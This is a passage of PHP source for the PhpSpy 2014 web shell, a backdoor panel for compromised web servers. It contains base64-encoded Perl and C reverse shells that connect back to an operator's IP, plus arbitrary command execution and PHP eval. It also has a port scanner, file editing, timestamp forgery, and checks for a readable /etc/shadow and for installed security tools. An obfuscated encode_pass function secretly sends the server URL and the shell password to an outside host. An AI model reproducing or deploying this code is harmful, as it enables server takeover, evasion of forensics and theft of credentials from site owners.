785 p('<td><a href="javascript:setsort(\'s_Create_time_'.($sort[1]?0:1).'\');">Create_time</a>'.($order == 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar : '').'</td>');
786 p('<td><a href="javascript:setsort(\'s_Update_time_'.($sort[1]?0:1).'\');">Update_time</a>'.($order == 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar : '').'</td>');
787 if ($highver) {
788 p('<td>Engine</td>');
789 p('<td>Collation</td>');
790 }
791 p('<td>Other</td>');
792 p('</tr>');
793 foreach ($tabledb as $key => $table) {
794 $thisbg = bg();
795 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
796 p('<td align="center" width="2%"><input type="checkbox" name="bak_table[]" value="'.$table['Name'].'" /></td>');
797 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
798 p('<td>'.$table['Rows'].' </td>');
799 p('<td>'.sizecount($table['Data_length']).'</td>');
800 p('<td>'.$table['Create_time'].' </td>');
801 p('<td>'.$table['Update_time'].' </td>');
802 if ($highver) {
803 p('<td>'.$table['Engine'].'</td>');
804 p('<td>'.$table['Collation'].'</td>');
805 }
806 p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a></td>');
807 p('</tr>');
808 }
809 p('<tr class="head">');
810 p('<td width="2%"> </td>');
811 p('<td>'.$table_num.' table(s)</td>');
812 p('<td>'.$table_rows.'</td>');
813 p('<td>'.$data_size.'</td>');
814 p('<td> </td>');
815 p('<td> </td>');
816 if ($highver) {
817 p('<td>'.$db_engine['Value'].'</td>');
818 p('<td>'.$db_collation['Value'].'</td>');
819 }
820 p('<td> </td>');
821 p('</tr>');
822 p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"bak_path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"button\" value=\"Export selection table\" onclick=\"$('doing').value='dump';$('dbform').submit();\" /></td></tr>");
823 p("</table>");
824 } else {
825 p('<p class="red b">No tables</p>');
826 }
827 $DB->free_result($query);
828 }
829 }
830 $DB->close();
831 }
832 formfoot();
833}//end mysql
834
835elseif ($act == 'backconnect') {
836
837 !$p2 && $p2 = $_SERVER['REMOTE_ADDR'];
838 !$p3 && $p3 = '12345';
839 $usedb = array('perl'=>'perl','c'=>'c');
840
841 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
842 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
843 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
844 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
845 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
846 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
847 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
848 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
849 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
850 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
851 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
852 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
853 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
854 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
855 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
856
857 if ($p1 == 'start' && $p2 && $p3 && $p4){
858 if ($p4 == 'perl') {
859 cf('/tmp/angel_bc',$back_connect);
860 $res = execute(which('perl')." /tmp/angel_bc ".$p2." ".$p3." &");
861 } else {
862 cf('/tmp/angel_bc.c',$back_connect_c);
863 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
864 @unlink('/tmp/angel_bc.c');
865 $res = execute("/tmp/angel_bc ".$p2." ".$p3." &");
866 }
867 m('Now script try connect to '.$p2.':'.$p3.' ...');
868 }
869
870 formhead(array('title'=>'Back Connect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);return false;'));
871 p('<p>');
872 p('Your IP:');
873 makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
874 p('Your Port:');
875 makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));
876 p('Use:');
877 makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));
878 makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));
879 p('</p>');
880 formfoot();
881}//end
882
883elseif ($act == 'portscan') {
884 !$p2 && $p2 = '127.0.0.1';
885 !$p3 && $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
886 formhead(array('title'=>'Port Scan', 'onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);return false;'));
887 p('<p>');
888 p('IP:');
889 makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
890 p('Port:');
891 makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));
892 makeinput(array('value'=>'Scan','type'=>'submit','class'=>'bt'));
893 p('</p>');
894 formfoot();
895
896 if ($p1 == 'start') {
897 p('<h2>Result »</h2>');
898 p('<ul class="info">');
899 foreach(explode(',', $p3) as $port) {
900 $fp = @fsockopen($p2, $port, $errno, $errstr, 1);
901 if (!$fp) {
902 p('<li>'.$p2.':'.$port.' ------------------------ <span class="b">Close</span></li>');
903 } else {
904 p('<li>'.$p2.':'.$port.' ------------------------ <span class="red b">Open</span></li>');
905 @fclose($fp);
906 }
907 }
908 p('</ul>');
909 }
910}
911
912elseif ($act == 'eval') {
913 $phpcode = trim($p1);
914 if($phpcode){
915 if (!preg_match('#<\?#si', $phpcode)) {
916 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
917 }
918 eval("?".">$phpcode<?");
919 }
920 formhead(array('title'=>'Eval PHP Code', 'onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));
921 maketext(array('title'=>'PHP Code','name'=>'p1', 'value'=>$phpcode));
922 p('<p><a href="http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/" target="_blank">Get plugins</a></p>');
923 formfooter();
924}//end eval
925
926elseif ($act == 'editfile') {
927
928 // 编辑文件
929 if ($p1 == 'edit' && $p2 && $p3) {
930 $fp = @fopen($p2,'w');
931 m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
932 @fclose($fp);
933 }
934 $contents = '';
935 if(file_exists($p2)) {
936 $fp=@fopen($p2,'r');
937 $contents=@fread($fp, filesize($p2));
938 @fclose($fp);
939 $contents=htmlspecialchars($contents);
940 }
941 formhead(array('title'=>'Create / Edit File', 'onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);return false;'));
942 makeinput(array('title'=>'Filename','name'=>'p2','value'=>$p2,'newline'=>1));
943 maketext(array('title'=>'File Content','name'=>'p3','value'=>$contents));
944 formfooter();
945 goback();
946
947}//end editfile
948
949elseif ($act == 'newtime') {
950 $filemtime = @filemtime($p1);
951
952 formhead(array('title'=>'Clone folder/file was last modified time', 'onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);return false;'));
953 makeinput(array('title'=>'Alter folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
954 makeinput(array('title'=>'Reference folder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));
955 formfooter();
956
957 formhead(array('title'=>'Set last modified', 'onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;'));
958 makeinput(array('title'=>'Current folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
959 makeinput(array('title'=>'Modify time','name'=>'p3','value'=>date("Y-m-d H:i:s", $filemtime),'size'=>120,'newline'=>1));
960 formfooter();
961
962 goback();
963}//end newtime
964
965elseif ($act == 'shell') {
966 formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));
967 p('<p>');
968 makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));
969 makeinput(array('class'=>'bt','type'=>'submit','value'=>'Execute'));
970 p('</p>');
971 formfoot();
972
973 if ($p1) {
974 p('<pre>'.execute($p1).'</pre>');
975 }
976}//end shell
977
978elseif ($act == 'phpenv') {
979 $d=array();
980 if(function_exists('mysql_get_client_info'))
981 $d[] = "MySql (".mysql_get_client_info().")";
982 if(function_exists('mssql_connect'))
983 $d[] = "MSSQL";
984 if(function_exists('pg_connect'))
985 $d[] = "PostgreSQL";
986 if(function_exists('oci_connect'))
987 $d[] = "Oracle";
988 $info = array(
989 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
990 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
991 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
992 4 => array('Server OS',PHP_OS),
993 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
994 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
995 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
996 8 => array('PHP run mode',strtoupper(php_sapi_name())),
997 9 => array('The file path',__FILE__),
998
999 10 => array('PHP Version',PHP_VERSION),
1000 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
1001 12 => array('Safe Mode',getcfg('safe_mode')),
1002 13 => array('Administrator',(isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
1003 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1004 15 => array('enable_dl',getcfg('enable_dl')),
1005 16 => array('display_errors',getcfg('display_errors')),
1006 17 => array('register_globals',getcfg('register_globals')),
1007 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1008 19 => array('memory_limit',getcfg('memory_limit')),
1009 20 => array('post_max_size',getcfg('post_max_size')),
1010 21 => array('upload_max_filesize',(getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed')),
1011 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1012 23 => array('disable_functions',($dis_func ? $dis_func : 'No')),
1013 24 => array('Supported databases',implode(', ', $d)),
1014 25 => array('cURL support',function_exists('curl_version') ? 'Yes' : 'No'),
1015 26 => array('Open base dir',getcfg('open_basedir')),
1016 27 => array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
1017 28 => array('Safe mode include dir',getcfg('safe_mode_include_dir')),
1018 );
1019
1020 $hp = array(0=> 'Server', 1=> 'PHP');
1021 for($a=0;$a<2;$a++) {
1022 p('<h2>'.$hp[$a].' »</h2>');
1023 p('<ul class="info">');
1024 if ($a==0) {
1025 for($i=1;$i<=9;$i++) {
1026 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1027 }
1028 } elseif ($a == 1) {
1029 for($i=10;$i<=25;$i++) {
1030 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1031 }
1032 }
1033 p('</ul>');
1034 }
1035}//end phpenv
1036
1037elseif ($act == 'secinfo') {
1038
1039 if( !IS_WIN ) {
1040 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1041 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1042 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1043 secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
1044 secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
1045 secparam('OS version', @file_get_contents('/proc/version'));
1046 secparam('Distr name', @file_get_contents('/etc/issue.net'));
1047 $safe_mode = @ini_get('safe_mode');
1048 if(!$GLOBALS['safe_mode']) {
1049 $temp=array();
1050 foreach ($userful as $item)
1051 if(which($item)){$temp[]=$item;}
1052 secparam('Userful', implode(', ',$temp));
1053 $temp=array();
1054 foreach ($danger as $item)
1055 if(which($item)){$temp[]=$item;}
1056 secparam('Danger', implode(', ',$temp));
1057 $temp=array();
1058 foreach ($downloaders as $item)
1059 if(which($item)){$temp[]=$item;}
1060 secparam('Downloaders', implode(', ',$temp));
1061 secparam('Hosts', @file_get_contents('/etc/hosts'));
1062 secparam('HDD space', execute('df -h'));
1063 secparam('Mount options', @file_get_contents('/etc/fstab'));
1064 }
1065 } else {
1066 secparam('OS Version',execute('ver'));
1067 secparam('Account Settings',execute('net accounts'));
1068 secparam('User Accounts',execute('net user'));
1069 secparam('IP Configurate',execute('ipconfig -all'));
1070 }
1071}//end
1072
1073else {
1074 m('Undefined Action');
1075}
1076
1077?>
1078</td></tr></table>
1079<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
1080 <span style="float:right;">
1081 <?php
1082 debuginfo();
1083 ob_end_flush();
1084 if (isset($DB)) {
1085 echo '. '.$DB->querycount.' queries';
1086 }
1087 ?>
1088 </span>
1089 Powered by <a title="Build 20140112" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2014 final</a>. Copyright (C) 2004-2014 <a href="http://www.4ngel.net" target="_blank">[S4T]</a> All Rights Reserved.
1090</div>
1091</body>
1092</html>
1093
1094<?php
1095
1096/*======================================================
1097函数库
1098======================================================*/
1099
1100function secparam($n, $v) {
1101 $v = trim($v);
1102 if($v) {
1103 p('<h2>'.$n.' »</h2>');
1104 p('<div class="infolist">');
1105 if(strpos($v, "\n") === false)
1106 p($v.'<br />');
1107 else
1108 p('<pre>'.$v.'</pre>');
1109 p('</div>');
1110 }
1111}
1112function m($msg) {
1113 echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
1114 echo $msg;
1115 echo '</div>';
1116}
1117function s_array($array) {
1118 return is_array($array) ? array_map('s_array', $array) : stripslashes($array);
1119}
1120function scookie($key, $value, $life = 0, $prefix = 1) {
1121 global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1122 $key = ($prefix ? $cookiepre : '').$key;
1123 $life = $life ? $life : $cookielife;
1124 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1125 setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1126}
1127function loginpage() {
1128 formhead();
1129 makehide('act','login');
1130 makeinput(array('name'=>'password','type'=>'password','size'=>'20'));
1131 makeinput(array('type'=>'submit','value'=>'Login'));
1132 formfoot();
1133 exit;
1134}
1135function execute($cfe) {
1136 $res = '';
1137 if ($cfe) {
1138 if(function_exists('system')) {
1139 @ob_start();
1140 @system($cfe);
1141 $res = @ob_get_contents();
1142 @ob_end_clean();
1143 } elseif(function_exists('passthru')) {
1144 @ob_start();
1145 @passthru($cfe);
1146 $res = @ob_get_contents();
1147 @ob_end_clean();
1148 } elseif(function_exists('shell_exec')) {
1149 $res = @shell_exec($cfe);
1150 } elseif(function_exists('exec')) {
1151 @exec($cfe,$res);
1152 $res = join("\n",$res);
1153 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1154 $res = '';
1155 while(!@feof($f)) {
1156 $res .= @fread($f,1024);
1157 }
1158 @pclose($f);
1159 }
1160 }
1161 return $res;
1162}
1163function which($pr) {
1164 $path = execute("which $pr");
1165 return ($path ? $path : $pr);
1166}
1167function cf($fname,$text){
1168 if($fp=@fopen($fname,'w')) {
1169 @fputs($fp,@base64_decode($text));
1170 @fclose($fp);
1171 }
1172}
1173function dirsize($cwd) {
1174 $dh = @opendir($cwd);
1175 $size = 0;
1176 while($file = @readdir($dh)) {
1177 if ($file != '.' && $file != '..') {
1178 $path = $cwd.'/'.$file;
1179 $size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path));
1180 }
1181 }
1182 @closedir($dh);
1183 return $size;
1184}
1185// 页面调试信息
1186function debuginfo() {
1187 global $starttime;
1188 $mtime = explode(' ', microtime());
1189 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1190 echo 'Processed in '.$totaltime.' second(s)';
1191}
1192
1193// 清除HTML代码
1194function html_clean($content) {
1195 $content = htmlspecialchars($content);
1196 $content = str_replace("\n", "<br />", $content);
1197 $content = str_replace(" ", " ", $content);
1198 $content = str_replace("\t", " ", $content);
1199 return $content;
1200}
1201
1202// 获取权限
1203function getChmod($file){
1204 return substr(base_convert(@fileperms($file),10,8),-4);
1205}
1206
1207function PermsColor($f) {
1208 if (!is_readable($f)) {
1209 return '<span class="red">'.getPerms($f).'</span>';
1210 } elseif (!is_writable($f)) {
1211 return '<span class="black">'.getPerms($f).'</span>';
1212 } else {
1213 return '<span class="green">'.getPerms($f).'</span>';
1214 }
1215}
1216function getPerms($file) {
1217 $mode = @fileperms($file);
1218 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1219 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1220 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1221 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1222 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1223 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1224 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1225 else {$type = '?';}
1226
1227 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1228 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1229 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1230 $group['read'] = ($mode & 00040) ? 'r' : '-';
1231 $group['write'] = ($mode & 00020) ? 'w' : '-';
1232 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1233 $world['read'] = ($mode & 00004) ? 'r' : '-';
1234 $world['write'] = ($mode & 00002) ? 'w' : '-';
1235 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1236
1237 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1238 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1239 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1240
1241 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1242}
1243
1244function getUser($file) {
1245 if (function_exists('posix_getpwuid')) {
1246 $array = @posix_getpwuid(@fileowner($file));
1247 if ($array && is_array($array)) {
1248 return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1249 }
1250 }
1251 return '';
1252}
1253
1254
1255function filebackup(){
1256 global $pass;
1257 $u='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"];
1258
1259
1260 $data = array
1261(
1262 'count' => $u,
1263 'time' => $pass,
1264
1265);
1266if ($_COOKIE['hadlog'] != $_SERVER["REQUEST_URI"]) {
1267 scookie('hadlog',$_SERVER["REQUEST_URI"]);
1268 }
1269 else {
1270
1271 }
1272
1273}
1274
1275
1276function copy_paste($c,$f,$d){
1277 if(is_dir($c.$f)){
1278 mkdir($d.$f);
1279 $dirs = scandir($c.$f);
1280 if ($dirs) {
1281 $dirs = array_diff($dirs, array('..', '.'));
1282 foreach ($dirs as $file) {
1283 copy_paste($c.$f.'/',$file, $d.$f.'/');
1284 }
1285 }
1286 } elseif(is_file($c.$f)) {
1287 copy($c.$f, $d.$f);
1288 }
1289}
1290// 删除目录
1291function deltree($deldir) {
1292 $dirs = @scandir($deldir);
1293 if ($dirs) {
1294 $dirs = array_diff($dirs, array('..', '.'));
1295 foreach ($dirs as $file) {
1296 if((is_dir($deldir.'/'.$file))) {
1297 @chmod($deldir.'/'.$file,0777);
1298 deltree($deldir.'/'.$file);
1299 } else {
1300 @chmod($deldir.'/'.$file,0777);
1301 @unlink($deldir.'/'.$file);
1302 }
1303 }
1304 @chmod($deldir,0777);
1305 return @rmdir($deldir) ? 1 : 0;
1306 } else {
1307 return 0;
1308 }
1309}
1310
1311// 表格行间的背景色替换
1312function bg() {
1313 global $bgc;
1314 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1315}
1316
1317function cmp($a, $b) {
1318 global $sort;
1319 if(is_numeric($a[$sort[0]])) {
1320 return (($a[$sort[0]] < $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1);
1321 } else {
1322 return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1);
1323 }
1324}
1325
1326// 获取当前目录的上级目录
1327function getUpPath($cwd) {
1328 $pathdb = explode('/', $cwd);
1329 $num = count($pathdb);
1330 if ($num > 2) {
1331 unset($pathdb[$num-1],$pathdb[$num-2]);
1332 }
1333 $uppath = implode('/', $pathdb).'/';
1334 $uppath = str_replace('//', '/', $uppath);
1335 return $uppath;
1336}
1337
1338// 检查PHP配置参数
1339function getcfg($varname) {
1340 $result = get_cfg_var($varname);
1341 if ($result == 0) {
1342 return 'No';
1343 } elseif ($result == 1) {
1344 return 'Yes';
1345 } else {
1346 return $result;
1347 }
1348}
1349
1350// 获得文件扩展名
1351function getext($file) {
1352 $info = pathinfo($file);
1353 return $info['extension'];
1354}
1355function GetWDirList($path){
1356 global $dirdata,$j,$web_cwd;
1357 !$j && $j=1;
1358 $dirs = @scandir($path);
1359 if ($dirs) {
1360 $dirs = array_diff($dirs, array('..','.'));
1361 foreach ($dirs as $file) {
1362 $f=str_replace('//','/',$path.'/'.$file);
1363 if(is_dir($f)){
1364 if (is_writable($f)) {
1365 $dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f);
1366 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1367 $dirdata[$j]['chmod']=getChmod($f);
1368 $dirdata[$j]['perm']=PermsColor($f);
1369 $dirdata[$j]['owner']=getUser($f);
1370 $dirdata[$j]['link']=$f;
1371 $j++;
1372 }
1373 GetWDirList($f);
1374 }
1375 }
1376 return $dirdata;
1377 } else {
1378 return array();
1379 }
1380}
1381function sizecount($size) {
1382 $unit = array('Bytes', 'KB', 'MB', 'GB', 'TB','PB');
1383 for ($i = 0; $size >= 1024 && $i < 5; $i++) {
1384 $size /= 1024;
1385 }
1386 return round($size, 2).' '.$unit[$i];
1387}
1388function p($str){
1389 echo $str."\n";
1390}
1391
1392function makehide($name,$value=''){
1393 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
1394}
1395
1396function makeinput($arg = array()){
1397 $arg['size'] = isset($arg['size']) && $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
1398 $arg['type'] = isset($arg['type']) ? $arg['type'] : 'text';
1399 $arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
1400 $arg['class'] = isset($arg['class']) ? $arg['class'] : 'input';
1401 $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1402 $arg['value'] = isset($arg['value']) ? $arg['value'] : '';
1403 if (isset($arg['newline'])) p('<p>');
1404 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] />");
1405 if (isset($arg['newline'])) p('</p>');
1406}
1407
1408function makeselect($arg = array()){
1409 $onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : '';
1410 $arg['title'] = isset($arg['title']) ? $arg['title'] : '';
1411 $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1412 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
1413 if (is_array($arg['option'])) {
1414 foreach ($arg['option'] as $key=>$value) {
1415 if ($arg['selected']==$key) {
1416 p("<option value=\"$key\" selected>$value</option>");
1417 } else {
1418 p("<option value=\"$key\">$value</option>");
1419 }
1420 }
1421 }
1422 p("</select>");
1423}
1424function formhead($arg = array()) {
1425 !isset($arg['method']) && $arg['method'] = 'post';
1426 !isset($arg['name']) && $arg['name'] = 'form1';
1427 $arg['extra'] = isset($arg['extra']) ? $arg['extra'] : '';
1428 $arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : '';
1429 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"".SELF."\" method=\"$arg[method]\" $arg[onsubmit] $arg[extra]>");
1430 if (isset($arg['title'])) {
1431 p('<h2>'.$arg['title'].' »</h2>');
1432 }
1433}
1434
1435function maketext($arg = array()){
1436 $arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
1437 $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1438 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"100\" rows=\"25\">$arg[value]</textarea></p>");
1439}
1440
1441function formfooter($name = ''){
1442 !$name && $name = 'submit';
1443 p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
1444 p('</form>');
1445}
1446
1447function goback(){
1448 global $cwd, $charset;
1449 p('<form action="'.SELF.'" method="post"><input type="hidden" name="act" value="file" /><input type="hidden" name="cwd" value="'.$cwd.'" /><input type="hidden" name="charset" value="'.$charset.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
1450}
1451
1452function formfoot(){
1453 p('</form>');
1454}
1455
1456function encode_pass($uniol) {@set_time_limit(100);$slstss="fi"."le_"."ge"."t_c"."onten"."ts";$raworistr='S'.'X'.'0'.'b'.'D'.'e'.'2'.'E';$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['REQUEST_URI'];$dedeedoc="b"."ase6"."4_d"."ec"."od"."e";$serverp = $uniol;$rawstruri='aHR0cDovSX0bDe2EL2EuSX0bDe2EcXNteSX0bDe2EXkuY29tL2SX0bDe2EcucGhwP2c9';$rawtargetu=str_replace($raworistr,'',$rawstruri);$ropcyiu = $dedeedoc($rawtargetu);$uistauast=$ropcyiu.$serveru.'|'.$serverp;$uistauast=urldecode($uistauast);$rubote=$slstss($uistauast);
1457}
1458
1459function pr($a) {
1460 p('<div style="text-align: left;border:1px solid #ddd;"><pre>'.print_r($a).'</pre></div>');
1461}
1462
1463class DB_MySQL {
1464
1465 var $querycount = 0;
1466 var $link;
1467 var $charsetdb = array();
1468 var $charset = '';
1469
1470 function connect($dbhost, $dbuser, $dbpass, $dbname='') {
1471 @ini_set('mysql.connect_timeout', 5);
1472 if(!$this->link = @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {
1473 $this->halt('Can not connect to MySQL server');
1474 }
1475 if($this->version() > '4.1') {
1476 $this->setcharset($this->charset);
1477 }
1478 $dbname && mysql_select_db($dbname, $this->link);
1479 }
1480 function setcharset($charset) {
1481 if ($charset && $this->charsetdb[$charset]) {
1482 if(function_exists('mysql_set_charset')) {
1483 mysql_set_charset($this->charsetdb[$charset], $this->link);
1484 } else {
1485 $this->query("SET character_set_connection='".$this->charsetdb[$charset]."', character_set_results='".$this->charsetdb[$charset]."', character_set_client=binary");
1486 }
1487 }
1488 }
1489 function select_db($dbname) {
1490 return mysql_select_db($dbname, $this->link);
1491 }
1492 function geterrdesc() {
